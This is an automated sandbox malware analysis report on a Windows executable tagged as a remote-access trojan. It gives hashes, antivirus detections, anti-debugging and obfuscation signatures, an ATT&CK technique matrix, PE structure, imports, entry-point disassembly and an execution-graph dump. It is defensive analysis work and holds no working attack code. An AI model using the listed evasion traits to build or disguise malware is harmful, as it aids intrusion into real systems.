Windows Analysis Report
Confirming#000092002.exe

Overview

General Information

Sample Name:Confirming#000092002.exe
Analysis ID:596169
MD5:24a097b3cd1e774e29e6e3e4f5e6522a
SHA1:f856350b37fae02331ce184b1f258f80900d8de5
SHA256:23cae5cce339ef9de5d22c2117af79d45013d65241fbe6faa7a36e94e191b42b
Tags:exe, limerat, warzonerat
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Sample file is different than original file name gathered from version info
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found large amount of non-executed APIs
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)

Classification

  • System is w10x64
  • Confirming#000092002.exe (PID: 6540 cmdline: "C:\Users\user\Desktop\Confirming#000092002.exe" MD5: 24A097B3CD1E774E29E6E3E4F5E6522A)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched

AV Detection

Source: Confirming#000092002.exe | ReversingLabs: Detection: 54%
Source: 1.2.Confirming#000092002.exe.ea0000.0.unpack | Avira: Label: ADWARE/Adware.Gen8
Source: 1.0.Confirming#000092002.exe.ea0000.0.unpack | Avira: Label: ADWARE/Adware.Gen8
Source: Confirming#000092002.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Confirming#000092002.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: Confirming#000092002.exe
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EAA22B FindFirstFileExW, 1_2_00EAA22B
Source: Confirming#000092002.exe, 00000001.00000000.244166012.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMultiRead.EXEB vs Confirming#000092002.exe
Source: Confirming#000092002.exe | Binary or memory string: OriginalFilenameMultiRead.EXEB vs Confirming#000092002.exe
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EAFA9C 1_2_00EAFA9C
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: String function: 00EA4730 appears 34 times
Source: Confirming#000092002.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA1B39 __EH_prolog3_catch_GS,__alloca_probe_16,LoadLibraryExA,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,FreeLibrary, 1_2_00EA1B39
Source: classification engine | Classification label: mal48.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA14A2 CoCreateInstance, 1_2_00EA14A2
Source: Confirming#000092002.exe | Static file information: File size 1320960 > 1048576
Source: Confirming#000092002.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x129400
Source: Confirming#000092002.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Confirming#000092002.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Confirming#000092002.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Confirming#000092002.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Confirming#000092002.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Confirming#000092002.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Confirming#000092002.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Confirming#000092002.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Confirming#000092002.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Confirming#000092002.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Confirming#000092002.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EB01B1 push ecx; ret 1_2_00EB01C4
Source: C:\Users\user\Desktop\Confirming#000092002.exe | API coverage: 3.3 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA71A3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect, 1_2_00EA71A3
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA4959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00EA4959
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA7B8E mov eax, dword ptr fs:[00000030h] 1_2_00EA7B8E
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA9DF6 mov eax, dword ptr fs:[00000030h] 1_2_00EA9DF6
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA71A3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C 1_2_00EA71A3
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EAB2B8 GetProcessHeap, 1_2_00EAB2B8
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA4AEF SetUnhandledExceptionFilter, 1_2_00EA4AEF
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA72E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00EA72E0
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA42DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00EA42DA
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA4775 cpuid 1_2_00EA4775
Source: C:\Users\user\Desktop\Confirming#000092002.exe | Code function: 1_2_00EA4BDE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00EA4BDE
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Software Packing | LSASS Memory | 2 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 13 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Source | Detection | Scanner | Label
Confirming#000092002.exe | 55% | ReversingLabs | Win32.Trojan.Tnega
No Antivirus matches
Source | Detection | Scanner | Label
1.2.Confirming#000092002.exe.ea0000.0.unpack | 100% | Avira | ADWARE/Adware.Gen8
1.0.Confirming#000092002.exe.ea0000.0.unpack | 100% | Avira | ADWARE/Adware.Gen8
No contacted domains info
No contacted IP infos
Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:596169
Start date and time:2022-03-24 11:33:12 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 9m 48s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Confirming#000092002.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal48.winEXE@1/0@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 91.9%)
  • Quality average: 77.4%
  • Quality standard deviation: 31.2%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 6
  • Number of non-executed functions: 54
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
  • Override analysis time to 240s for sample files taking high CPU consumption
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
  • Not all processes were analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateThreadEx calls found.
  • Report size getting too big, too many NtResumeThread calls found.
  • Report size getting too big, too many NtTerminateThread calls found.
No simulations
No context
No created / dropped files found
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):2.7481336301363
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Confirming#000092002.exe
File size:1320960
MD5:24a097b3cd1e774e29e6e3e4f5e6522a
SHA1:f856350b37fae02331ce184b1f258f80900d8de5
SHA256:23cae5cce339ef9de5d22c2117af79d45013d65241fbe6faa7a36e94e191b42b
SHA512:bece11031bd79539c0669a62f3945d43ce0d78d768d242762c81213f471af17dc7a33c04527f1276edb27510334f8aae7b19b2cc2c204af2d560f0612e2f8651
SSDEEP:6144:aNk8vti3OqUP1bL00RiTwSltgxCKYPMXq9NmiQBYGhpX8x4MWy1FYCz8hJ2n3C+e:Ak8l4D4pa7+ocZ
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V\-..=C..=C..=C..V@..=C..VF..=C.pEG..=C.pE@..=C.pEF.#=C..VE..=C..VG..=C..VB..=C..=B..=C..DJ..=C..D...=C..=...=C..DA..=C.Rich.=C
Icon Hash:00828e8e8686b000
Entrypoint:0x404718
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x6237B381 [Sun Mar 20 23:06:41 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:5ed77736e49da7d22b203d8d8f918a6b
Instruction
call 00007F006871E223h
jmp 00007F006871DB8Fh
retn 0000h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00405570h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [00419008h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
push ebp
mov ebp, esp
and dword ptr [00542724h], 00000000h
sub esp, 24h
or dword ptr [00419010h], 01h
push 0000000Ah
call dword ptr [0041122Ch]
test eax, eax
je 00007F006871DEC2h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
nop
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh
mov dword ptr [ebp-08h], eax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x174a0 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x143000 | 0xd28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x144000 | 0x12dc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x16380 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x162c0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x11000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xf9cd | 0xfa00 | False | 0.605875 | data | 6.61019563742 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x11000 | 0x7322 | 0x7400 | False | 0.416386045259 | data | 4.90923942869 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x19000 | 0x129e78 | 0x129400 | False | 0.133981253942 | data | 2.29316435389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x143000 | 0xd28 | 0xe00 | False | 0.339006696429 | data | 3.85073462575 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x144000 | 0x12dc | 0x1400 | False | 0.7365234375 | data | 6.39751442919 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
REGISTRY | 0x1434d0 | 0xaa | ASCII text | English | United States
TYPELIB | 0x1436a0 | 0x4d0 | data | English | United States
RT_DIALOG | 0x143580 | 0x11a | data | English | United States
RT_STRING | 0x143b70 | 0x32 | data | English | United States
RT_VERSION | 0x1431f0 | 0x2dc | data | English | United States
RT_MANIFEST | 0x143ba8 | 0x17d | XML 1.0 document text | English | United States
DLL | Import
KERNEL32.dll | DecodePointer, DeleteCriticalSection, GetTickCount, AcquireSRWLockExclusive, AssignProcessToJobObject, CompareStringW, ConnectNamedPipe, CreateDirectoryW, CreateEventW, CreateFileMappingW, CreateFileW, CreateIoCompletionPort, CreateJobObjectW, CreateMutexW, CreateNamedPipeW, CreateProcessW, CreateRemoteThread, CreateSemaphoreW, DebugBreak, DeleteFileW, DisconnectNamedPipe, DuplicateHandle, EncodePointer, EnterCriticalSection, EnumSystemLocalesEx, EnumSystemLocalesW, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FlushViewOfFile, FormatMessageA, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetComputerNameExW, GetConsoleCP, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetDateFormatW, GetDriveTypeW, GetEnvironmentStringsW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileSizeEx, GetFileType, GetFullPathNameW, GetLocalTime, GetLocaleInfoW, GetLongPathNameW, CreateThread, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOEMCP, GetProcAddress, GetProcessHandleCount, GetProcessHeaps, GetProcessId, GetProcessTimes, GetQueuedCompletionStatus, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDefaultLCID, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempPathW, GetThreadContext, GetThreadId, GetThreadLocale, GetThreadPriority, GetTimeFormatW, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultLangID, GetUserDefaultLocaleName, GetModuleFileNameA, SizeofResource, VirtualProtect, SetLastError, VirtualAlloc, LoadLibraryExA, LeaveCriticalSection, FindResourceA, Sleep, IsDBCSLeadByte, LoadResource, WideCharToMultiByte, lstrcmpiA, GetConsoleOutputCP, SetFilePointerEx, SetStdHandle, IsValidCodePage, HeapReAlloc, HeapSize, LCMapStringW, WriteFile, VirtualQuery, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, RaiseException, CloseHandle, GetLastError, MultiByteToWideChar, GetCurrentThreadId, InitializeCriticalSectionEx, GetModuleFileNameW, RtlUnwind, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, GetProcessHeap, HeapFree, IsDebuggerPresent, OutputDebugStringW, HeapAlloc, WriteConsoleW
USER32.dll | CharNextA, MessageBoxA
ADVAPI32.dll | RegQueryInfoKeyW, RegDeleteKeyA, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, RegDeleteValueA, RegEnumKeyExA, RegCloseKey
ole32.dll | CoCreateInstance, CoTaskMemFree, CoTaskMemRealloc, CoTaskMemAlloc
OLEAUT32.dll | VarUI4FromStr
Description | Data
LegalCopyright | Microsoft Corporation. All rights reserved.
InternalName | MultiRead
FileVersion | 1, 0, 0, 1
ProductName | MultiRead Module
ProductVersion | 1, 0, 0, 1
FileDescription | MultiRead Module
OriginalFilename | MultiRead.EXE
Translation | 0x0409 0x04b0
Language of compilation system | Country where language is spoken
English | United States
No network behavior found

Target ID:1
Start time:12:34:20
Start date:24/03/2022
Path:C:\Users\user\Desktop\Confirming#000092002.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\Confirming#000092002.exe"
Imagebase:0xea0000
File size:1320960 bytes
MD5 hash:24A097B3CD1E774E29E6E3E4F5E6522A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

    Execution Graph

    Execution Coverage:1.5%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:2.2%
    Total number of Nodes:979
    Total number of Limit Nodes:25
eaabd2 9068 eaa969 9062->9068 9063 eaad09 9063->9060 9067 ea8b82 _free 14 API calls 9063->9067 9066->9061 9066->9062 9067->9060 9106 ea70e3 9068->9106 9071 eaa98a GetOEMCP 9073 eaa9b3 9071->9073 9072 eaa99c 9072->9073 9074 eaa9a1 GetACP 9072->9074 9073->8632 9075 ea8bbc 9073->9075 9074->9073 9076 ea8bfa 9075->9076 9080 ea8bca _free 9075->9080 9078 ea75d4 _free 14 API calls 9076->9078 9077 ea8be5 HeapAlloc 9079 ea8bf8 9077->9079 9077->9080 9078->9079 9079->8634 9080->9076 9080->9077 9081 ea893e _free 2 API calls 9080->9081 9081->9080 9083 eaa969 39 API calls 9082->9083 9084 eaadee 9083->9084 9086 eaae28 IsValidCodePage 9084->9086 9090 eaae64 __CreateFrameInfo 9084->9090 9085 ea403c _ValidateLocalCookies 5 API calls 9087 eaac21 9085->9087 9088 eaae3a 9086->9088 9086->9090 9087->8640 9087->8643 9089 eaae69 GetCPInfo 9088->9089 9092 eaae43 __CreateFrameInfo 9088->9092 9089->9090 9089->9092 9090->9085 9149 eaaa3f 9092->9149 9094 eaa867 ___scrt_is_nonwritable_in_current_image 9093->9094 9233 ea9d97 EnterCriticalSection 9094->9233 9096 eaa871 9234 eaa8a8 9096->9234 9101->9063 9105 ea9ddf LeaveCriticalSection 9102->9105 9104 eaad59 9104->9066 9105->9104 9107 ea7103 9106->9107 9108 ea70fa 9106->9108 9107->9108 9109 ea90a4 _unexpected 37 API calls 9107->9109 9108->9071 9108->9072 9110 ea7123 9109->9110 9114 ea92f6 9110->9114 9115 ea9309 9114->9115 9116 ea7139 9114->9116 9115->9116 9122 eac23d 9115->9122 9118 ea9323 9116->9118 9119 ea934b 9118->9119 9120 ea9336 9118->9120 9119->9108 9120->9119 9144 eaadbb 9120->9144 9123 eac249 ___scrt_is_nonwritable_in_current_image 9122->9123 9124 ea90a4 _unexpected 37 API calls 9123->9124 9125 eac252 9124->9125 9126 eac298 9125->9126 9135 ea9d97 EnterCriticalSection 9125->9135 9126->9116 9128 eac270 9136 eac2be 9128->9136 9133 ea8a26 CallUnexpected 37 API calls 9134 eac2bd 9133->9134 9135->9128 9137 eac2cc __fassign 9136->9137 9139 eac281 9136->9139 9138 eabff1 __fassign 14 API calls 9137->9138 9137->9139 9138->9139 9140 eac29d 9139->9140 
9143 ea9ddf LeaveCriticalSection 9140->9143 9142 eac294 9142->9126 9142->9133 9143->9142 9145 ea90a4 _unexpected 37 API calls 9144->9145 9146 eaadc5 9145->9146 9147 eaacd3 __fassign 37 API calls 9146->9147 9148 eaadcb 9147->9148 9148->9119 9150 eaaa67 GetCPInfo 9149->9150 9159 eaab30 9149->9159 9155 eaaa7f 9150->9155 9150->9159 9151 ea403c _ValidateLocalCookies 5 API calls 9153 eaabbd 9151->9153 9153->9090 9160 eabe51 9155->9160 9158 ead34e 41 API calls 9158->9159 9159->9151 9161 ea70e3 __fassign 37 API calls 9160->9161 9162 eabe71 9161->9162 9180 eab0ca 9162->9180 9164 eabe9e 9165 eabf2f 9164->9165 9167 ea8bbc 15 API calls 9164->9167 9171 eabec4 __CreateFrameInfo __alloca_probe_16 9164->9171 9166 ea403c _ValidateLocalCookies 5 API calls 9165->9166 9168 eaaae7 9166->9168 9167->9171 9175 ead34e 9168->9175 9169 eabf29 9183 eabf54 9169->9183 9171->9169 9172 eab0ca __fassign MultiByteToWideChar 9171->9172 9173 eabf12 9172->9173 9173->9169 9174 eabf19 GetStringTypeW 9173->9174 9174->9169 9176 ea70e3 __fassign 37 API calls 9175->9176 9177 ead361 9176->9177 9187 ead164 9177->9187 9181 eab0db MultiByteToWideChar 9180->9181 9181->9164 9184 eabf60 9183->9184 9186 eabf71 9183->9186 9185 ea8b82 _free 14 API calls 9184->9185 9184->9186 9185->9186 9186->9165 9188 ead17f 9187->9188 9189 eab0ca __fassign MultiByteToWideChar 9188->9189 9193 ead1c3 9189->9193 9190 ead328 9191 ea403c _ValidateLocalCookies 5 API calls 9190->9191 9192 eaab08 9191->9192 9192->9158 9193->9190 9194 ea8bbc 15 API calls 9193->9194 9198 ead1e8 __alloca_probe_16 9193->9198 9194->9198 9195 ead28d 9197 eabf54 __freea 14 API calls 9195->9197 9196 eab0ca __fassign MultiByteToWideChar 9199 ead22e 9196->9199 9197->9190 9198->9195 9198->9196 9199->9195 9215 ea99ea 9199->9215 9202 ead29c 9206 ea8bbc 15 API calls 9202->9206 9207 ead2ae __alloca_probe_16 9202->9207 9203 ead264 9203->9195 9204 ea99ea 6 API calls 9203->9204 9204->9195 9205 ead319 9209 eabf54 __freea 14 API calls 9205->9209 9206->9207 9207->9205 9208 
ea99ea 6 API calls 9207->9208 9210 ead2f6 9208->9210 9209->9195 9210->9205 9221 eab146 9210->9221 9212 ead310 9212->9205 9213 ead345 9212->9213 9214 eabf54 __freea 14 API calls 9213->9214 9214->9195 9224 ea96c3 9215->9224 9219 ea9a3b LCMapStringW 9220 ea99fb 9219->9220 9220->9195 9220->9202 9220->9203 9222 eab15d WideCharToMultiByte 9221->9222 9222->9212 9225 ea97be _free 5 API calls 9224->9225 9226 ea96d9 9225->9226 9226->9220 9227 ea9a47 9226->9227 9230 ea96dd 9227->9230 9229 ea9a52 9229->9219 9231 ea97be _free 5 API calls 9230->9231 9232 ea96f3 9231->9232 9232->9229 9233->9096 9244 eaafc1 9234->9244 9236 eaa8ca 9237 eaafc1 25 API calls 9236->9237 9238 eaa8e9 9237->9238 9239 eaa87e 9238->9239 9240 ea8b82 _free 14 API calls 9238->9240 9241 eaa89c 9239->9241 9240->9239 9258 ea9ddf LeaveCriticalSection 9241->9258 9243 eaa88a 9243->8635 9245 eaafd2 9244->9245 9254 eaafce __InternalCxxFrameHandler 9244->9254 9246 eaafd9 9245->9246 9249 eaafec __CreateFrameInfo 9245->9249 9247 ea75d4 _free 14 API calls 9246->9247 9248 eaafde 9247->9248 9250 ea748c __CreateFrameInfo 25 API calls 9248->9250 9251 eab01a 9249->9251 9252 eab023 9249->9252 9249->9254 9250->9254 9253 ea75d4 _free 14 API calls 9251->9253 9252->9254 9256 ea75d4 _free 14 API calls 9252->9256 9255 eab01f 9253->9255 9254->9236 9257 ea748c __CreateFrameInfo 25 API calls 9255->9257 9256->9255 9257->9254 9258->9243 9260 ea8a85 9259->9260 9261 ea8a77 9259->9261 9262 ea75d4 _free 14 API calls 9260->9262 9261->9260 9266 ea8a9c 9261->9266 9263 ea8a8d 9262->9263 9264 ea748c __CreateFrameInfo 25 API calls 9263->9264 9265 ea8a97 9264->9265 9265->8591 9266->9265 9267 ea75d4 _free 14 API calls 9266->9267 9267->9263 9269 ea8119 9268->9269 9273 ea80e5 9268->9273 9270 ea8130 9269->9270 9272 ea8b82 _free 14 API calls 9269->9272 9271 ea8b82 _free 14 API calls 9270->9271 9271->9273 9272->9269 9273->8592 10642 ea886a 10645 ea87f1 10642->10645 10646 ea87fd ___scrt_is_nonwritable_in_current_image 10645->10646 10653 ea9d97 
EnterCriticalSection 10646->10653 10648 ea8835 10654 ea8853 10648->10654 10650 ea8807 10650->10648 10652 eac2be __fassign 14 API calls 10650->10652 10652->10650 10653->10650 10657 ea9ddf LeaveCriticalSection 10654->10657 10656 ea8841 10657->10656 10658 ea8f6b 10659 ea8f86 10658->10659 10660 ea8f76 10658->10660 10664 ea8f8c 10660->10664 10663 ea8b82 _free 14 API calls 10663->10659 10665 ea8fa7 10664->10665 10666 ea8fa1 10664->10666 10668 ea8b82 _free 14 API calls 10665->10668 10667 ea8b82 _free 14 API calls 10666->10667 10667->10665 10669 ea8fb3 10668->10669 10670 ea8b82 _free 14 API calls 10669->10670 10671 ea8fbe 10670->10671 10672 ea8b82 _free 14 API calls 10671->10672 10673 ea8fc9 10672->10673 10674 ea8b82 _free 14 API calls 10673->10674 10675 ea8fd4 10674->10675 10676 ea8b82 _free 14 API calls 10675->10676 10677 ea8fdf 10676->10677 10678 ea8b82 _free 14 API calls 10677->10678 10679 ea8fea 10678->10679 10680 ea8b82 _free 14 API calls 10679->10680 10681 ea8ff5 10680->10681 10682 ea8b82 _free 14 API calls 10681->10682 10683 ea9000 10682->10683 10684 ea8b82 _free 14 API calls 10683->10684 10685 ea900e 10684->10685 10690 ea8db8 10685->10690 10691 ea8dc4 ___scrt_is_nonwritable_in_current_image 10690->10691 10706 ea9d97 EnterCriticalSection 10691->10706 10693 ea8dce 10696 ea8b82 _free 14 API calls 10693->10696 10697 ea8df8 10693->10697 10696->10697 10707 ea8e17 10697->10707 10698 ea8e23 10699 ea8e2f ___scrt_is_nonwritable_in_current_image 10698->10699 10711 ea9d97 EnterCriticalSection 10699->10711 10701 ea8e39 10702 ea9059 _free 14 API calls 10701->10702 10703 ea8e4c 10702->10703 10712 ea8e6c 10703->10712 10706->10693 10710 ea9ddf LeaveCriticalSection 10707->10710 10709 ea8e05 10709->10698 10710->10709 10711->10701 10715 ea9ddf LeaveCriticalSection 10712->10715 10714 ea8e5a 10714->10663 10715->10714 10435 ea44d7 10436 ea44df 10435->10436 10452 ea87b4 10436->10452 10438 ea44ea 10459 ea40fe 10438->10459 10440 ea4959 4 API calls 10442 ea4581 